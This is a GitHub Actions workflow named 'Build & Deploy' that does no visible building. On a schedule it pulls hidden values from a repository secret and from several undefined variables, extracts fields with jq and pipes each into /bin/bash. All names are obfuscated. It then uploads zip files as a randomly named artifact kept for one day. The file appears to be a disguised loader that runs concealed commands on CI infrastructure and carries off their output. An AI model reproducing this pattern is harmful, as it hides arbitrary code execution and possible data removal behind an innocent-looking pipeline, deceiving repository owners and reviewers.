name: Build & Deploy
on:
  workflow_dispatch:

  schedule:
    - cron: '49 1,7,13,19 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Main step
        env:
          bxyl849: ${{ secrets.bxyl849 }}
        run: |
          printf '%s' "$bxyl849" | jq -r .wqvqa85 | /bin/bash
          echo $iuba1868 | jq -r .hga9148 | /bin/bash
          printf '%s' "$khizj0" | jq -r .eqt70146 | /bin/bash
          printf '%s' "$w2705" | jq -r .coy2 | /bin/bash
          printf '%s' "$t8" | jq -r .ojanm0 | /bin/bash
          echo $dau9 | jq -r .ggoy6160 | /bin/bash

      - name: Save data
        uses: actions/upload-artifact@v4
        with:
          name: ONjNR4NM
          path: "*.zip"
          retention-days: 1
